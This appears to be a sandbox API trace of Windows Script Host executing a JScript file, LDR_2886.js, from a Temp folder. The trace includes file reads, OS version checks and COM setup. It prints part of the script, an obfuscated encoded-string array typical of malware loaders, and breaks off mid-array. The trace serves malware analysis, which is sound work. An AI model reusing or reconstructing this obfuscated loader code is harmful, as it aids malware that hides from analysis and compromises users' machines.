	[0047.987] ISystemDebugEventFire:BeginSession (This=0x1375b0, guidSourceID=0x7fee3375da8, strSessionName="JScript:00002980:00002984:18119637") returned 0x0
	[0047.987] GetCurrentThreadId () returned 0xba8
	[0047.987] ??2@YAPEAX_K@Z () returned 0x3671e0
	[0047.987] ??2@YAPEAX_K@Z () returned 0x367230
	[0047.987] malloc (_Size=0x80) returned 0x3672e0
	[0047.987] malloc (_Size=0x108) returned 0x367370
	[0047.987] GetTickCount () returned 0x1d355
	[0047.987] GetCurrentThreadId () returned 0xba8
	[0047.987] ??2@YAPEAX_K@Z () returned 0x367480
	[0047.987] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\ldr_2886.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x110
	[0047.987] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0047.987] CreateFileMappingA (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b68, lpName=0x0) returned 0x114
	[0047.987] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x310000
	[0047.988] GetVersionExA (in: lpVersionInformation=0x30efd0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd343301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x30efd0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0047.988] IsTextUnicode (in: lpv=0x310000, iSize=19304, lpiResult=0x30efc0 | out: lpiResult=0x30efc0) returned 0
	[0047.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x310000, cbMultiByte=19304, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19304
	[0047.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x310000, cbMultiByte=19304, lpWideCharStr=0x13f978, cchWideChar=19304 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0047.988] UnmapViewOfFile (lpBaseAddress=0x310000) returned 1
	[0047.989] CloseHandle (hObject=0x114) returned 1
	[0047.989] CloseHandle (hObject=0x110) returned 1
	[0047.989] GetSystemDirectoryA (in: lpBuffer=0x30f048, uSize=0x0 | out: lpBuffer="\x8c\xf4\x30") returned 0x14
	[0047.989] ??2@YAPEAX_K@Z () returned 0x3674d0
	[0047.989] GetSystemDirectoryA (in: lpBuffer=0x3674d0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0047.989] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefd710000
	[0047.989] ??3@YAXPEAX@Z () returned 0x165fff01
	[0047.989] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferIdentifyLevel") returned 0x7fefd72e470
	[0047.989] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefd72f9b0
	[0047.989] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferCloseLevel") returned 0x7fefd72f660
	[0047.989] IdentifyCodeAuthzLevelW () returned 0x1
	[0048.187] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30e1c0 | out: lpSystemTimeAsFileTime=0x30e1c0*(dwLowDateTime=0x95f818e0, dwHighDateTime=0x1d543d1)) 
	[0048.187] GetCurrentProcessId () returned 0xba4
	[0048.187] GetCurrentThreadId () returned 0xba8
	[0048.187] GetTickCount () returned 0x1d400
	[0048.187] QueryPerformanceCounter (in: lpPerformanceCount=0x30e1c8 | out: lpPerformanceCount=0x30e1c8*=17261318956) returned 1
	[0048.187] malloc (_Size=0x100) returned 0x367b60
	[0048.188] GetVersionExA (in: lpVersionInformation=0x30dfa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe32bf810, dwBuildNumber=0x7fe, dwPlatformId=0xe32b0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x30dfa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0048.188] GetUserDefaultLCID () returned 0x409
	[0048.189] IsFileSupportedName () returned 0x1
	[0048.189] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0048.189] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0048.189] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0048.204] GetSignedDataMsg () returned 0x0
	[0048.204] GetCurrentProcess () returned 0xffffffffffffffff
	[0048.204] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x30e800, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x30e800*=0x140) returned 1
	[0048.204] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0048.204] ??2@YAPEAX_K@Z () returned 0x36a4f0
	[0048.205] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0048.205] ReadFile (in: hFile=0x140, lpBuffer=0x36a4f0, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x30e7e0, lpOverlapped=0x0 | out: lpBuffer=0x36a4f0*, lpNumberOfBytesRead=0x30e7e0*=0x4b68, lpOverlapped=0x0) returned 1
	[0048.205] CoInitialize (pvReserved=0x0) returned 0x1
	[0048.205] CoCreateInstance (in: rclsid=0x7fee32bf850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee32bf860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x30e750 | out: ppv=0x30e750*=0x36f4c0) returned 0x0
	[0048.209] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30c950 | out: lpSystemTimeAsFileTime=0x30c950*(dwLowDateTime=0x95fb7440, dwHighDateTime=0x1d543d1)) 
	[0048.209] GetCurrentProcessId () returned 0xba4
	[0048.209] GetCurrentThreadId () returned 0xba8
	[0048.209] GetTickCount () returned 0x1d41f
	[0048.209] QueryPerformanceCounter (in: lpPerformanceCount=0x30c958 | out: lpPerformanceCount=0x30c958*=17263553347) returned 1
	[0048.210] malloc (_Size=0x100) returned 0x367c70
	[0048.210] __dllonexit () returned 0x7fee31d14c0
	[0048.210] __dllonexit () returned 0x7fee31d14e8
	[0048.210] GetVersionExA (in: lpVersionInformation=0x30c730*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xe31d2dc9, dwBuildNumber=0x7fe, dwPlatformId=0xe31d14e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x30c730*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0048.210] GetProcessWindowStation () returned 0x30
	[0048.210] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x30c718, nLength=0xc, lpnLengthNeeded=0x30c710 | out: pvInfo=0x30c718, lpnLengthNeeded=0x30c710) returned 1
	[0048.210] ??2@YAPEAX_K@Z () returned 0x36f060
	[0048.210] ??2@YAPEAX_K@Z () returned 0x36f0b0
	[0048.210] ??2@YAPEAX_K@Z () returned 0x36f0e0
	[0048.210] ??2@YAPEAX_K@Z () returned 0x36f120
	[0048.210] ??2@YAPEAX_K@Z () returned 0x36f160
	[0048.210] ??2@YAPEAX_K@Z () returned 0x36f1a0
	[0048.210] ??2@YAPEAX_K@Z () returned 0x36f1e0
	[0048.210] ??2@YAPEAX_K@Z () returned 0x36f220
	[0048.210] ??2@YAPEAX_K@Z () returned 0x36f260
	[0048.210] ??2@YAPEAX_K@Z () returned 0x36f2a0
	[0048.210] ??2@YAPEAX_K@Z () returned 0x36f2e0
	[0048.210] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.210] ??2@YAPEAX_K@Z () returned 0x36f330
	[0048.210] ??2@YAPEAX_K@Z () returned 0x36f370
	[0048.210] DllGetClassObject (in: rclsid=0x13e400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30d420 | out: ppv=0x30d420*=0x36f0b0) returned 0x0
	[0048.211] ??2@YAPEAX_K@Z () returned 0x36f0b0
	[0048.211] IClassFactory:CreateInstance (in: This=0x36f0b0, pUnkOuter=0x0, riid=0x30e200*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x30d440 | out: ppvObject=0x30d440*=0x36f4c0) returned 0x0
	[0048.211] ??2@YAPEAX_K@Z () returned 0x36f3b0
	[0048.211] GetSystemInfo (in: lpSystemInfo=0x30d280 | out: lpSystemInfo=0x30d280*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0048.211] VirtualQuery (in: lpAddress=0x30d2f0, lpBuffer=0x30d2b0, dwLength=0x30 | out: lpBuffer=0x30d2b0*(BaseAddress=0x30d000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0048.211] ??2@YAPEAX_K@Z () returned 0x36f3f0
	[0048.211] ??2@YAPEAX_K@Z () returned 0x36f410
	[0048.211] ??2@YAPEAX_K@Z () returned 0x36f470
	[0048.211] ??2@YAPEAX_K@Z () returned 0x36f4a0
	[0048.211] ??2@YAPEAX_K@Z () returned 0x36f550
	[0048.211] IUnknown:AddRef (This=0x36f4c0) returned 0x2
	[0048.211] IUnknown:Release (This=0x36f4c0) returned 0x1
	[0048.211] IUnknown:Release (This=0x36f0b0) returned 0x0
	[0048.211] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.211] IUnknown:QueryInterface (in: This=0x36f4c0, riid=0x7fee32bf860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x30e688 | out: ppvObject=0x30e688*=0x36f4c0) returned 0x0
	[0048.212] IUnknown:Release (This=0x36f4c0) returned 0x1
	[0048.212] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0048.212] IsTextUnicode (in: lpv=0x36a4f0, iSize=19304, lpiResult=0x30e6d8 | out: lpiResult=0x30e6d8) returned 0
	[0048.212] GetACP () returned 0x4e4
	[0048.212] malloc (_Size=0x97d0) returned 0x37dfd0
	[0048.212] GetACP () returned 0x4e4
	[0048.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x36a4f0, cbMultiByte=19304, lpWideCharStr=0x37dfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0